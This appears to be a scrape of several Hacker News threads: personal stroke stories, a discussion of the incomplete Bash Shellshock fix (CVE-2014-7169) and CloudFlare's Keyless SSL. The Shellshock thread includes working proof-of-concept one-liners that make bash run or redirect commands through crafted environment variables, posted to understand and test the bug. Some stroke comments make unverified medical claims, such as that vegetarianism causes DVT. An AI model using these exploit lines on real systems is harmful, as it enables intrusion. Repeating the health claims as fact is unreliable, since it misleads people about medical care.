I was 32 when I had a stroke (March 4th, 2003). It was a different kind of stroke, affecting a different part of my brain, essentially related to vision. I was half blind, but I only realized something was "strange" when I saw myself in the mirror: I had only one eye. My brain knew I should have two: I was half blind.

The first diagnosis was migraine with aura (blindness in my case). But the aura should have lasted no more than an hour. Two days later, the aura (blindness) was still there (a sign of infarct but my doctor didn't know it).

I spent 2 days alone in the dark. I forgot to eat but I knew I had to call a taxi to take me to the hospital. I wasn't scared, I though it was just a migraine. It really looked and felt like my usual migraines. So my doctor had me take anti-migraine pills, which are vasoconstrictors. That might have caused the actual stroke: extreme vasoconstriction. Never take anti-migraine treatment during the aura. Never.

It took 2 days before I was diagnosed at the hospital, but they just told me "I see a shadow on the CT scan"... so I spent the next 2 days wondering what kind of shadow? stroke or cancer? And no, I didn't think about asking.

It took one week to be hospitalized for 10 days (my mother called the hospital, harassed them until she could talk to a doctor, who said it was an emergency... one week after the stroke).

It took 15 days before I woke up in the morning and thought "Wow! WOW! I'm back now!". Before that, I spent most of my time sleeping, reading half a page between two naps. I was sleeping more than I was awake.

It took 3 months before I could look at everything I wanted. Before that, looking at trees (and other complex objects) was "painful", and watching movies was too exhausting (especially action movies). During these 3 months, I recovered from blindness, but not completely. I still have a blind spot in my field of view today.

It took 6 months before my mood was really restored. Before that, I needed a daily nap, lots of soothing music, and no pressure at all.

I took aspirin daily for 3 years, after which my neurologist told me I could stop.

I had a few migraines after that, and even ended under oxygen at the hospital once, but I always recovered within 15 days.

It was 10 years ago, and it changed my life. I quit my job as a developer, spent 2 years wondering what to do next, then became a wedding photographer. In february this year, almost 10 years after, I got a new job as a developer.

I'm back on rails (node.js to be precise :-)

tucaz 4 days ago 1 reply      
About 15 years ago my father had a stroke at our house. I was about 12 years old and at home at the time along with my grandmother. We didn't know what was happening. At one second he was okay and in another he was on the floor. It was almost impossible to put him back at the bed even with the help of one of our tenants.

We called my mother at work and the funny thing is that before she came home to take him to the ER he was able to ask for coffee (and drink it) and also to smoke a cigarette.

Moving 15 years forward he's still with us (62 years old) with no movement at all on the left side of his body. Had a heart attack with major surgery, is on more than 15 different medications, has diabetes and a bunch of other "minor problems".

My mother gave up her life to take care of him and everyday is a struggle because of the existing problems prior to the stroke and the ones that came after he became bitter and really mean to those who love and take care of him.

I'm not sure why I wrote about this but I felt like sharing. It's not easy when people don't recover, but for some reason I believe we have to take care of them and do our part.

ZeroCoin 4 days ago 1 reply      
>I wandered outside the boundaries of telemetry. They lost my heartbeat. When I returned, they scolded me.

The audacity of health care industry workers (those who should know what a certain disease entails) who place blame on their patients for acting normally is infuriating.

I had kidney stones once at a young age. I remember barely walking into the emergency room one night after they became too painful.

As soon as I arrived, white as a sheet of paper, they asked me a few questions... doped me up on morphine... and managed to "lose" me on a gurney in a hallway somewhere for a few hours until my girlfriend at the time came and found me.

They took xrays I believe and I was free to go with some more painkillers in hand.

Apparently the hospital told me that I was supposed to call them by X date if I wanted any more painkillers.

I called them back about a week after that date had passed, asked for a refill, and was scolded like I was some drug addict just looking for a fix. I think they even hung up on me. How could I be so stupid as to have forgotten a date they told me when I was high as a kite by their own doing? Right.

I ended up passing them without any painkillers which as many of you have probably heard is unbelievably painful.

I understand that it can get monotonous working in a hospital, but with the amount of money they're paid to work there you would hope that they would be required to operate with a little compassion. Considering the fact that many people in a hospital are leaving this world.

What if the author's last memory was that of a person she didn't know berating her for something she wasn't sure she even did?

TAM_cmlx 3 days ago 1 reply      
Two years ago this October I was homeless. I would wander around all night for fear of attacks[1] and try to sleep during the day at the university while sitting on a bench or chair. In October the winter shelters had not yet opened here, and it was so cold I feared I would freeze to death. I wandered into ER on a pretext: there was a swelling in my leg, spider bite maybe?

I overheard the intake person talking with someone: "I'm worried about that guy in #68." Why? "He thinks he's got a spider bite, but he's got blood clot written all over him."

I felt pretty good about that; it meant I'd have a place to sleep for a whole night. Then I was suddenly surrounded by 5 or 6 people.

Symptoms, sir?

Sometimes slurred speech, tingling in the extremities, can't spell anymore, confused by the way people talk so _fast_, confused by simple things, excessively paranoid, feels like there's an Ace bandage wrapped around my chest.

You're a junkie. No. You're exclusively vegetarian. No. You're diabetic. No, I've been tested for that. Well, we'll take a blood draw.

I got an ultrasound over my legs -- and they discovered a DVT. Next thing I knew, they'd slapped me in hospital for eight days. I was put on no less than eight medications, the scariest of which was Coumadin (same as Warfarin, I think?) -- scary because they made me watch a video describing it, by which I mean "You follow these instructions to the letter or you gonna die, son." At least that's what it felt like. And I had to sign all kinds of waivers, or something. Two of the residents (very young women) told me that they had had DVT's themselves... possibly as a result of being exclusively vegetarian?

The diagnosis was: Pernicious Anemia. My understanding (which is not to be trusted) is that the myelin sheathing around my nerves has been dissolving for years. Apparently the communicating tissue between the axons in my brain had been going away for quite some time.

I liked this diagnosis because: it's easily treatable; it explains my increasingly weird behavior; I'm not dead from it.

The treatment is: Take B12 every day for the rest of my life.

The highly-abbreviated coda to the story is: My Doctor told I'd had this disease for at least ten years(!); hospital got me a case manager, who got me Disability, Homed, and a Laptop. But it took 2 years or so.

TLDR: Being exclusively vegetarian can cause DVT's


huhtenberg 4 days ago 8 replies      
Remember this -

  You have FOUR HOURS to get a person with a stroke to the emergency. 
If you do, their chances of survival are dramatically higher.

patio11 4 days ago 2 replies      
My mother had a stroke. The fallout is very, very hard for the patient and their family.

Diet and exercise are, apparently, the easiest levers you have to control for stroke risk. Trust me: this is the best of all possible reasons to care about those. You do not want to go through it and you do not want your family to go through it. Specifics elided for privacy but suffice it to say that it combined elements of a heart attack, advanced Alzheimer's, and a profound war injury in a compact package that arrived on a normal sunny Tuesday.

pragone 4 days ago 0 replies      
Strokes can present in truly any number of ways. The Cincinnati Stroke Scale, often seen in public health campaigns as "FAST", provides three simple, quick assessments that can reliably delineate a majority of strokes. It is the standard for basic EMTs as well. More advanced providers should perform a more comprehensive exam, testing all the cranial nerves (actually usually just II through XII). A more formalized, advanced stroke scale is the NIH stroke scale: http://stroke.nih.gov/documents/NIH_Stroke_Scale.pdf

While there are often some kind of neurologic deficit associated with a stroke, the goal standard is, of course, a CT or CTA that should be administered immediately upon arrival in the ED of a suspected stroke (depending on the presentation of symptoms an exam by a neurologist may occur first).

The symptoms described in this story would absolutely make me think this person was having a stroke if she had verbalized them to someone with my training.

It's also worthwhile to point out that the person having a stroke may not realize they are having a stroke. People may have the obvious symptoms - slurred speech and hemiparesis - and refuse to acknowledge that these problems exist, because, in their mind, they don't.

If you think someone is having a stroke, record the time you first noticed symptoms and call 911 immediately.

day_ 4 days ago 0 replies      
Great article.

I had a stroke one night in my 20's. When I woke up, my right side was numb (I thought I just slept on my arm), I spoke gibberish and was unable to write but I felt fine and I thought I spoke perfectly fine. I finally figured out that something was not right when I tried to write a message to my mom on the back of an envelope to tell her that I was fine and I just drew a straight line instead of letters.That's when she called an ambulance.

Luckily I was back to normal within a month, but I struggled for some time to to find the right words when talking.

tluyben2 3 days ago 1 reply      
I had a TIA when I was 28 (over 10 years ago) and under heavy stress (high blood pressure; they did not find any other causes; I was healthy as I could be, just extreme stress from my own business at that time); I swore after that to never be stressed again (and took measures to make sure that is possible, like living in southern Spain for large parts of the year) and haven't been since. I even forgot how it felt. My life is so much better that I now thank this TIA. Stress is pure hell and whatever business people think they get out of it; it's bullshit IMHO; I have had way more business success than ever without stress than I had with.
alexitosrv 4 days ago 0 replies      
Four weeks ago my girlfriend, 32 yo, had a brain stroke because a deep venous thrombosis at her left side of the head. It was intense to see how much she deteriorated in the course of just a few hours, starting with a seizure and some very acute headaches she had together with vomiting the previous days. We were in intensive care around 10 days, and then 3 days more in hospitalization. The investigation of her tendency to hypercoagulate yielded as main culprit sedentarism and the previous uninterrupted usage of oral contraceptives (mercilon) for almost ten years. We were fortunate in some sense as the cause was easy to point out and also as we discarded autoinmuse diaseases (my biggest concern) and now she is under low molecular weight heparin, hoping that the clot is reabsorbed in two or three months.

As part of the recovery, I'm reading to her My Stroke of Hindsight, of Jill Bolte Taylor, and her symptoms and the description of the episode of the acute phase match largely: speech loss, paralysys of her right part of the body and rational disconnect with external stimuli.

This article highlights also how sensible we are to the changes of what we are at the end: physicochemical interactions. I was worried my girlfriend would lose her essence, but thanks to God her recovery has been amazing so far.

treehau5 4 days ago 0 replies      
I am not sure if you are the OP or know her, but this story touched my heart. It is beautiful. I am only imagine how strong she has to be, and the people around her must be to get through this. My sister and her husband are going through the very same thing -- He was progressing very well in his career and they just had their first child when he suffered his from the same reason - a hole in the heart. All the best. You and all the stroke victims have my prayers tonight.
pimentel 4 days ago 1 reply      
All the stories I know and heard of stroke victims in their 30's or 40's make me think and ask: is there really a way to prevent or predict a stroke?

Would the "controversial routine full body scan" help? Specially to people who have a parent being an early stroke victim?

These things are scary as hell...

skizm 4 days ago 2 replies      
Remember FAST: http://en.wikipedia.org/wiki/FAST_(stroke)

First 3 minutes of the house episode Fetal Position (S3 E17) demonstrate it.

Pxtl 3 days ago 1 reply      
> Each night, I took the box of Lovenox syringes and carried it to my husband, sobbing. Its time for my shot, I said, tears streaming down my face.

> Each night, he pinched skin on my belly as I screamed like a toddler and he injected the medicine.

Her husband sounds like an awesome guy - taking care of her in that state sounds incredibly difficult.

> My husband and I decided to get a divorce.

> I think in hindsight, it was your stroke that changed everything for me, he said.

> I thought it was the affair hed had. But maybe he had a point. Maybe that was the year, I said.


camperman 4 days ago 1 reply      
Her memory experience was already reminding me of Leonard in Memento and then she writes, "it's time for my shot." That hit me unreasonably hard.
spindritf 4 days ago 3 replies      
Well, I just popped an Aspirin for no reason.
GuiA 4 days ago 3 replies      
Will smartwatches with heart rate/other health sensors be able to detect strokes right when they happen? Or maybe even slightly before they do?
glxc 3 days ago 0 replies      
This is an amazing article and incredible blog

Among many interesting and inspiring themes, of interest to the HN community may be the disassociation of vision and objects. All of the deep learning models succeeding in classification emulate one side of the brain, while perspectives like this present life outside the constraint of rational thinking.

cell303 4 days ago 0 replies      
I was terrified after reading this. Reminded me that I should live a bit healthier, not drink more coffee then water, got to sleep earlier, wake up earlier, maybe even exercise. But more important, it got me thinking. The non-routine kind of thinking. Read some old diary entries. Wrote a new one, after almost a year.
jlavarj 3 days ago 0 replies      
My wife had a stroke at the age of 30, seven years ago. It happened in the hospital during an embolization procedure. She was unconscious for 5 days. This event has obviously changed her life, but I wasn't prepared for the ways it would change mine. Thank you for sharing this.
delackner 3 days ago 0 replies      
Profound. Thank you for sharing this. It pains me to read though that you had years of abnormal symptoms (severe shortness of breath, migraines, etc) and the medical system was unable to detect the issue early. This seems like the sort of issue that early detection could provide tremendous quality of life / survivability improvements at little risk. If the existing tests are too difficult, then we need more tests.
taybin 3 days ago 0 replies      
This was on buzzfeed?? Crazy. Didn't think those soul-less bottom-feeders would turn to quality long-form essays.
yousifa 3 days ago 0 replies      
This is the best piece I have read in a while. It is amazing how something so small could affect our life. We are so delicate. Do you actually see objects as shapes and colors (as in, was the part of the brain that translates the signal into images lost) or was that you can not figure out what it is that you are looking at?
dgorges 3 days ago 0 replies      
There is a similar TED Talk worth watching:

Jill Bolte Taylor:My stroke of insight

http://www.ted.com/talks/jill_bolte_taylor_s_powerful_stroke... 18:19 min, Feb 2008)

nikant 3 days ago 0 replies      
Such a well written article. I loved the details with which the incident was described.
bshimmin 4 days ago 3 replies      
I wish Buzzfeed only had articles like this.
diestl 4 days ago 4 replies      
Not sure what this has got to do with programming?
ozy23378 3 days ago 3 replies      
> As a result, my left brain, the expert at numbers and language and logic and reasoning, a part of it suffocated and died. My right brain, the specialist with regard to color, music, creativity, intuition, and emotions, therefore could not talk to my left brain.

This popular myth of broad specialization of the hemispheres needs to die. The author lost credibility there.

CVE-2014-7169: Bash Fix Incomplete, Still Exploitable
543 points by caust1c  1 day ago   208 comments top 44
mdeslaur 19 hours ago 5 replies      
Proposed patch for CVE-2014-7169 here:


I am building bash updates for Ubuntu containing the proposed fix here and will publish them once the fix has been made official:


daveloyall 10 hours ago 3 replies      
All this "echo date, cat echo" business is confusing.

Let me fix that for you.

    hobbes@metalbaby:~$ export badvar='() { (a)=>\'    hobbes@metalbaby:~$ bash -c "somestring executeMe"    bash: badvar: line 1: syntax error near unexpected token `='    bash: badvar: line 1: `'    bash: error importing function definition for `badvar'    bash: executeMe: command not found    hobbes@metalbaby:~$ cat somestring  #it exists but is empty.    hobbes@metalbaby:~$ bash -c "somestring date"    bash: badvar: line 1: syntax error near unexpected token `='    bash: badvar: line 1: `'    bash: error importing function definition for `badvar'    hobbes@metalbaby:~$ cat somestring     Thu Sep 25 11:01:35 CDT 2014    hobbes@metalbaby:~$ bash -c "somestring echo hello"    bash: badvar: line 1: syntax error near unexpected token `='    bash: badvar: line 1: `'    bash: error importing function definition for `badvar'    hobbes@metalbaby:~$ cat somestring     hello
Gititgotitgood? Great. Now how the heck does anybody think that is as bad as the first one?

For this one, an attacker needs to control both the environment AND the command line of the child shell.

People, if those criteria are met, the attacker wins, with or without bugs.

Yes, yes, there are situations where the attacker has partial control of the command line via a filename argument or whatever--whatever indeed! That's not even in the same category as the first bug.

jimrandomh 1 day ago 4 replies      
With the patched bash, if you run

    env X='() { (a)=>\' sh -c "echo date"
This is equivalent to running

    date >echo
That is, you can put something in the environment which causes it to drop the first token, run the result as a command, and redirect the result to the dropped first token.

An example of a context where this would be exploitable, is a CGI webapp which accepts an uploaded zip file, stores it in a FAT filesystem, and and runs system("unzip /path/to/file"). Then putting a corrupt string in a header would cause the file to be executed, rather than unzipped.

danielweber 23 hours ago 1 reply      
Earlier on a mailing list someone pointed out that there is still an awful lot of string processing going on by bash even after this afternoon's fix. So further bugs were likely to be found now that everyone is constantly sniffing around the place.
ambrop7 19 hours ago 3 replies      
Can someone explain why bash is evaluating and looking for function definitions in every environment variable? What would be broken if this entire "feature", whatever it is, was completely disabled?

That's almost like a C compiler looking for C programs in string literals. It just doesn't make sense to me.

billpg 17 hours ago 0 replies      
Am I reading this right? If a string starts with the characters '() {', it is handled differently by the interpreter?

What am I meant to do if I actually want to store the characters '() {' in a string?

jewel 23 hours ago 6 replies      
What tools are people using to track and push out security updates, if any? Right now I only have a few servers to administer so apticron is sufficient for notification and upgrading isn't a burden.

Also, does anyone have a way to push out patched packages fast? Imagine that a patch is available, or it's trivial to remove a feature that you're not using, but the distribution hasn't made a package yet. I have been dreaming of making a system to help debian users create and manage a local set of packages, but haven't really had a chance to take it to a point where it'd be helpful in this scenario.

My extended thoughts on the matter: http://stevenjewel.com/2013/10/hacking-open-source/

fyrabanks 21 hours ago 0 replies      
Welp, I'm about to take a hammer to all of my data centers and get busy, then move deep into the woods. Good luck to everybody else who decides to leave their equipment functioning; it was nice knowing you.
timv 23 hours ago 2 replies      
Reproduced from my comment on the discussion of the previous CVE

The same trick can be used to read files as well

  $ date -u > file1  $ env -i X='() { (a)=<\' bash -c 'file1 cat'  bash: X: line 1: syntax error near unexpected token `='  bash: X: line 1: `'  bash: error importing function definition for `X'  Thu Sep 25 02:14:30 UTC 2014 
Though obviously it's going to be trickier to find an system that issues commands in a way that can act as a path for that sort of exploit.

schrodingersCat 11 hours ago 2 replies      
A little off topic, but am I still vulnerable?

I'm running OSX mavericks 10.9.5, use zsh as my default shell, and have a patched version of bash build from homebrew repo set as secondary in /etc/shells (on the occasion I need bash, I like to have completions). System bash is still vulnerable. With my current configuration, how worried should I be?

Any insight is appreciated!

jvreeland 20 hours ago 1 reply      
Does anyone know what Apples policy on fixing this might be? I understand why they ship with an older version of bash and other GNU userspace tools but is there a precedent they've set for backporting?
Erwin 18 hours ago 1 reply      
RHEL made a C shared object available that you can preload in everything which cleans up the environment of the magic "() {" bit : https://access.redhat.com/articles/1200223 and apparently exactly that sequence has magic meaning; "( ) {" does not work )

For CGI scripts, only putting it in /etc/ld.so.preload worked for me. It seems like the CGI environment has LD_PRELOAD stripped (I checked /proc/apache_pid/environ which has LD_PRELOAD, but the CGI script running does not).

owenfi 18 hours ago 3 replies      
The exploit worked against my cgi perl scripts as well!

I had cgi-bin/update.pl running on OS X and I exploited it as mentioned here: https://twitter.com/hernano/status/514866681530023936

My perl scripts call $out = `git pull`, log to a file, and print a response; I was quite surprised the exploit worked against them. Promptly disabled, upgraded bash, and re-enabled, now disabling all cgi for a bit longer.

What are the common vectors beyond CGI-space for the average server? How do we find and test them?

userbinator 20 hours ago 1 reply      
It looks like the important part of the patch (bash43-025) is here:

In builtins/evalstring.c:

    if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)
In variables.c:

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
So what the patch does is create a special mode of parse_and_execute() where it's supposed to only evaluate function definitions. A better option would be to add a flag to parse_and_execute() that disables it from attempting any execution completely, not just function definitions.

jtchang 23 hours ago 1 reply      
I'm starting to see automated attack attempts using HTTP_HOST headers set to '() {'.
deckiedan 20 hours ago 3 replies      
OK - so assuming that there isn't going to be a single patch which fixes all possible / related bugs any time soon.


- Change /bin/sh to something else. (CentOS has BASH as default, alas...)- Filter out unknown, or suspicious looking HTTP vars / env vars at varnish/apache/nginx level, somehow... (doesn't stop other services)- Figure out some clever SELinux configuration that blocks it.

I wonder how much would fail on switching out BASH as default sh?

fixtafernback 1 hour ago 0 replies      
Say I have a Perl CGI script that interfaces with ffmpeg and imagemagick with backtick operators. Am I vulnerable by default? Is there anything I can do to protect myself other than take them offline?
kalleboo 16 hours ago 1 reply      
I've been trying to exploit our own systems which have PHP web frontends running under apache/mod_php, and in my testing PHP isn't passing through any HTTP_* environment variables at all in calls to system() or exec().

Even just echoing back the result of "env" it doesn't look like I get anything user-supplied whatsoever in there (no HTTP_*)

Can anyone more knowledgable confirm what I've seen?

songgao 23 hours ago 3 replies      
OK two questions:

1. Does zsh (or other shells) also have these kind of string processings where bugs are likely?

2. Is there a way to completely remove bash from the system and use zsh (or other shells) instead?

forgery-- 23 hours ago 1 reply      
Another PoC:

env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo

Creates file called echo and outputs the contents using head.

(from https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24)

annnnd 16 hours ago 2 replies      
It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash. Seriously, polutting ENV with HTTP headers? Admins should at least be able to block this.

It should be possible to mitigate this attack (and many similar) by better header values parsing (in Apache/nginx/... - maybe in some proxy?). For instance, Content-Type header can only include alphanumeric chars + slashes. Most of the other headers are similar. User-Agent is free-form, but there is no need to pass it to ENV (and it could be sanitized to only include alphanumeric chars and spaces).

Any idea, are web server maintainers working on this?

milankragujevic 9 hours ago 1 reply      
Here is a simple little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/
someguy222 18 hours ago 0 replies      
I found some exploitprobes from a server called datacards.org. Happend on a server located in germany. Its some kind of personal data gathering system (National Defense University DataCards)


Should be limited to Afganistan and stuff

WestCoastJustin 1 day ago 1 reply      
Appears to work, even with latest patches, by using sh (from the link):

  $ env X='() { (a)=>\' sh -c "echo date"; cat echo  date  Wed Sep 24 15:00:34 PDT 2014  -- previous bug fix for bash (before/after patch) --  $ x='() { :;}; echo vulnerable' bash -c 'echo test'  vulnerable  test  $ x='() { :;}; echo vulnerable' bash -c 'echo test'  bash: warning: x: ignoring function definition attempt  bash: error importing function definition for `x'  test
Tested on Ubuntu 14.04.1 LTS & Debian GNU/Linux 7.0 (wheezy) with latest patches.

ps. lots of chatter about the original issue @ https://news.ycombinator.com/item?id=8361574

Pyppe 14 hours ago 2 replies      
Stumbled upon https://gist.github.com/anonymous/929d622f3b36b00c0be1

Just to verify; apache httpd / nginx without CGI-support is not vulnerable?

drtse4 13 hours ago 0 replies      
Link to the vulnerability report for Debian if someone needs it: https://security-tracker.debian.org/tracker/CVE-2014-7169
lovelearning 20 hours ago 1 reply      
I'd like to check if my home router is vulnerable to this over HTTP or DHCP or SSH. Is there any tool I can use, like the heartbleed folks had?

My router runs DD-WRT (an old version which I can't upgrade), has an administration web page and has ssh access enabled. It does not have remote web administration enabled. Any tips?

reidrac 14 hours ago 0 replies      
Ubuntu Trusty's patched version 4.3 doesn't seem to be affected by this, but Precise version still is (4.2; same one as in Debian).

Is this new exploit version dependent?

mdaniel 21 hours ago 1 reply      
Do I correctly understand that there were `expr 7169 - 6271` 898 potential (or is that confirmed?) vulnerabilities tracked in the few hours between those two mailing list messages?

If true, I never really comprehended the volume of vulnerabilities flying by every day.

IBM 20 hours ago 1 reply      
I can't imagine why people are so paranoid about the tech companies having backdoors (especially when they explicitly deny it) when the NSA or other intelligence agencies could have lots of unknown vulnerabilities to exploit.
tinix 14 hours ago 0 replies      
lol @ this: http://seclists.org/oss-sec/2014/q3/681

Soon someone will be suggesting that you have to add some random string to all of your env variables to make them work, otherwise they are ignored, like with CSRF mitigation.

Actually, I jest, but that's probably a good idea, anything running on the system could view some /tmp file with the string and append it to the env variable string or something, but any remote client wouldn't be able to access that.


passfree 15 hours ago 0 replies      
Hi everyone,

We just published this tool to test for Shellsheck. https://suite.websecurify.com/market/shellshock

Do a scan over before it is too late.

rcthompson 19 hours ago 3 replies      
I run an Ubuntu server in my closet as a general-purpose file server and such, mostly just for my own use or for sending files to friends. I have just turned it off and disabled all port forwards to it, and I will wait at least a few days and check for a more definitive fix before opening it back up to the internet. I recommend anyone in a similar situation do the same.
moloch 1 day ago 2 replies      
PoC floating around:

rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo

stalinone 18 hours ago 2 replies      
My solaris is default to tcsh but with bash installed, am I affected?
reedloden 18 hours ago 0 replies      
If it's truely unused, you should be using /bin/false instead of /bin/sh. Note that /bin/sh is not always dash in many cases, so just because you are using /bin/sh over /bin/bash doesn't mean you're not vulnerable.
Athas 16 hours ago 0 replies      
Is this a problem even if /bin/sh is not bash? I'm pretty confused at why one would ever want /bin/sh to be bash (and not, say, dash). If you want bash, ask for it.
HaydenJames 22 hours ago 1 reply      
jMyles 1 day ago 0 replies      
I just tested on fully patched Ubuntu 14.04 - still vulnerable per this method.
limsdims 14 hours ago 2 replies      
My Zsh seems vulnerable. Anyone else care to replicate this?

-- ~ zsh --version

zsh 5.0.2 (x86_64-apple-darwin13.0)

~ echo $SHELL


~ env x='() { do_something;}; echo vulnerable' bash -c "echo this is a test"


this is a test---

martin_ 20 hours ago 2 replies      
An accepted patch has been released in the form of 4.3-9.1 [1]. It's available on debian everywhere except oldstable.

[1] http://osdir.com/ml/general/2014-09/msg47743.html

segmondy 20 hours ago 2 replies      
I'm very annoyed by the founder of this exploit, if you are going to release something as serious as this. At least work on a solution first. Bash source code is open and out there, isn't this suppose to be the "benefits" of open source? Gee.
Announcing Keyless SSL
507 points by jgrahamc  7 days ago   184 comments top 27
lucb1e 7 days ago 3 replies      
For those who want to understand how it works (it took me a minute, so I'll try to explain it simpler):

In simplified terms, the server usually stores a public and private key, and sends the public key to the client. The client generates a random password, encrypts it with the server's public key, and sends it to the server. Only anyone with the private key can decrypt the message, and that should only be the server.

Now you don't want to hand over this private key to Cloudflare if you don't need to, because then they can read all traffic. Up until now, you needed to.

What they did was take the private key and move it to a keyserver, owned by your bank or whomever. Every time the Cloudflare server receives a random password (which is encrypted with the public key) it just asks the keyserver "what does this encrypted message say?" After that it has the password to the connection and can read what the client (the browser) is sending, and write data back over the same encrypted connection. Without ever knowing what the private key was.

The connection from Cloudflare to your bank's webserver and keyserver can be encrypted in whatever way. It could be a fixed key for AES, it could be another long-lasting TLS connection (the overhead is mostly in the connection setup)... this isn't the interesting part and can be solved in a hundred fine ways.

Edit: Removed my opinion from this post. Any downvotes for my opinion would also push the explanation down (which I hope is useful to some). I mostly agree with the other comments anyway.

indutny 7 days ago 2 replies      
And my patch for OpenSSL that does the same thing: https://gist.github.com/indutny/1bda1561254f2d133b18 , ping me on email if you want to find out how to use it in your setup.
delinka 7 days ago 5 replies      
Instead of keeping the key in a potentially vulnerable place, they're putting it in an oracle: pass ciphertext to the oracle, get plaintext back. I'm interested in the authentication between CloudFlare and the oracle. Cryptographic examples involving an oracle tend to refer to the oracle as a black box that just blindly accepts data, transforms it, and replies. Of course, then the oracle's content (a key, an algorithm) risks exposure through deduction if an attacker can submit limitless requests. See http://en.wikipedia.org/wiki/Chosen-plaintext_attack

I'm not at all suggesting that CF hasn't thought of this; rather I want to see their mitigation of the risk.

mhandley 7 days ago 3 replies      
This seems to only slightly reduce the threat to the banks.

Currently, if someone compromises the Cloudfare servers, they gain the bank's private key and can impersonate the bank until the bank revokes their keys.

With this solution, if someone compromises the Cloudfare servers, they can impersonate the bank by relaying the decryption of the premaster secret through Cloudfare's compromised servers back to the bank. They can do this until Cloudfare notices and closes the security hole.

It's not clear that the difference is all that great in reality, as most of the damage will be done in the first 24 hours of either compromise.

personZ 7 days ago 4 replies      
After reading the beginning of the piece, I was expected something more...profound. Some deep mathematical breakthrough or something.

Instead they separate the actual key signing, delegating it to the customer's device. That's nice and useful, but isn't quite what I was expecting.

teddyh 7 days ago 4 replies      
So the communication between Cloudflare and the actual SSL key holder is secured by what? Another key? In that case, any compromise of Cloudflares key is the same as a compromise of the original SSL key (at least in the short term).
otterley 7 days ago 4 replies      
Keyless SSL is basically an analogue of ssh-agent(1) for OpenSSL. It's a nice feature that you no longer have to trust CloudFlare with your private key, but there's a huge tradeoff: if your keyserver is unavailable (ironically, due to any of the things CloudFlare is supposed to protect you from or buffer you against -- DDoS, network/server issues, etc.), they can no longer authenticate requests served on your behalf and properly serve traffic.
windexh8er 7 days ago 2 replies      
All other technicalities aside it's rather interesting. From an HSM perspective it either makes that hardware now very useful or very useless.

Think of a large organization - you've been there (or not), there are 30 internal applications with self-signed certificates. Fail. The organization had purchased an HSM, but never really got it deployed because - well, that was too complex and it didn't integrate well with 3rd party network hardware and failed miserably in your *nix web stack.

This could be interesting - and I'm not commenting with regard to the efficacy or security concerns around this, but mainly the workflow simplicity it provides to large organizations who end up in self-signed-cert-hell because HSMs don't interoperate easily in a lot of use cases.

But to my original statement - this is a very good thing or a very bad thing for Thales and the like. The only requirement for an actually certified HSM, really, is certification against some hardware and software standard you have a checkbox to fulfill. Beyond that this would be a killer in the middleground for those who want an HSM like functionality but don't have any requirements to meet other than housing a secure segment where key management can be done in a more controlled manner.

vader1 7 days ago 1 reply      
While this is a cool feature, I wouldn't say the improvement is more than marginal: all potentially sensitive customer data is still available to Cloudflare in plain text. And after all, with a Business plan you can already use your own ("custom") SSL certificate which you can then revoke at any time.

Why not offer a "pass through" mode where the proxying is done on the network layer rather than the application layer? Of course in such a modus all CDN-like functionality could no longer be offered, but it could still do a fair amount of DDOS protection, no?

mback2k 7 days ago 0 replies      
So, this is not actually keyless SSL but SSL using something like a Hardware Security Module over networked PKCS#11. Did I miss something?
zaroth 7 days ago 1 reply      
See: Secure session capability using public-key cryptography without access to the private key.


praseodym 7 days ago 4 replies      
So CloudFlare won't get your private key, but will still get to see unencrypted plaintext for all traffic? Sounds like a huge improvement...
xorcist 7 days ago 1 reply      
The article is somewhat light on content. There are standard protocols for HSM use. What is the reason you didn't use these? There are clear risks involved with inventing your own security related protocols.
_pmf_ 7 days ago 0 replies      
Are we reinventing Kerberos again?
blibble 7 days ago 3 replies      
isn't this completely missing the point, i.e. banks being able to say 'no third parties can see our clients identifying information/balances/etc?'

yes, the SSL key doesn't leave the bank, but everything it is protecting is..

bjornsing 7 days ago 0 replies      
> World-renowned security experts Jon Callas and Phil Zimmermann support CloudFlare's latest announcement sharing, One of the core principles of computer security is to limit access to cryptographic keys to as few parties as possible, ideally only the endpoints. Application such as PGP, Silent Circle, and now Keyless SSL implement this principle and are correspondingly more secure.

Ehh... I'd say Keyless SSL implements the opposite of that principle: encryption terminates with CloudFlare but authentication terminates in some bank.

yk 7 days ago 0 replies      
So the problem is, how to get a cloud in the middle while keeping the green lock in the browser? Just yesterday I read Douglas Adam's phrase "technologies biggest success over itself."
kcbanner 7 days ago 1 reply      
Interesting, but what about the latency issues of having to always contact the key server?
sarciszewski 7 days ago 0 replies      
That is amazing. I can't wait to play with this code :D
yusyusyus 7 days ago 1 reply      
How does this architecture address PFS? I'm guessing a future version would require the exchange of DH private key to make it work...
ambrop7 7 days ago 1 reply      
I don't like to sound hateful, but this is an obvious solution that any competent person knowing how TLS works would find. If someone tried to patent it, I suppose every smart card would be considered prior art. The only "novelty" is that the connection to the "smart card" is the network.

Not to say that it's not useful, but the article describes it as some grand invention.

general_failure 7 days ago 0 replies      
Well, cloudfare can still read all the traffic. I thought that problem had been solved somehow.
diafygi 7 days ago 1 reply      
Is this the free SSL announcement that CloudFlare said it was going to announce in October?
liricooli 6 days ago 0 replies      
It seems that the correct title should have been "all your keys are belong to us".
EGreg 7 days ago 0 replies      
Wow, what a great read!
ilaksh 7 days ago 1 reply      
This is a discussion about cyberwarfare in a literal sense. The technical discussion shouldn't really be separated from the economic, political, social and human health concerns because all of those parts of the system interact deeply and directly.

A goal of total political cooperation or submission leads to economic sanctions leading to serious human health effects leading to defensive denial of service attacks. This accelerates the need to decentralize the financial network systems to make them more robust.

How can we imagine though that even after a complete transition to next generation systems that are ground-up distributed designs (not just stop-gap tweaks like this) that we won't have new types of attacks to deal with.

The starting point is the belief system that provides such fertile ground for conflict. We have to promote the idea that human lives have value and that lethal force is not an acceptable way to resolve conflict.

As long as decision makers are living in a sort of 1960s James Bond fantasy world we will all be subject to the insecurity of that type of world. Its largely built upon a type of primitive Social Darwinism that is still much more prevalent than most will acknowledge.

Its much easier to accept a compartmentalization of these problems and focus on a narrow technical aspect, but that does not integrate nearly enough information.

zameericle 7 days ago 1 reply      
Sounds like Elliptic Curve Diffie-Hellman is used between client/server to establish a private key. Not sure how this is new.
Lecture 1 How to Start a Startup [video]
504 points by declan  2 days ago   183 comments top 45
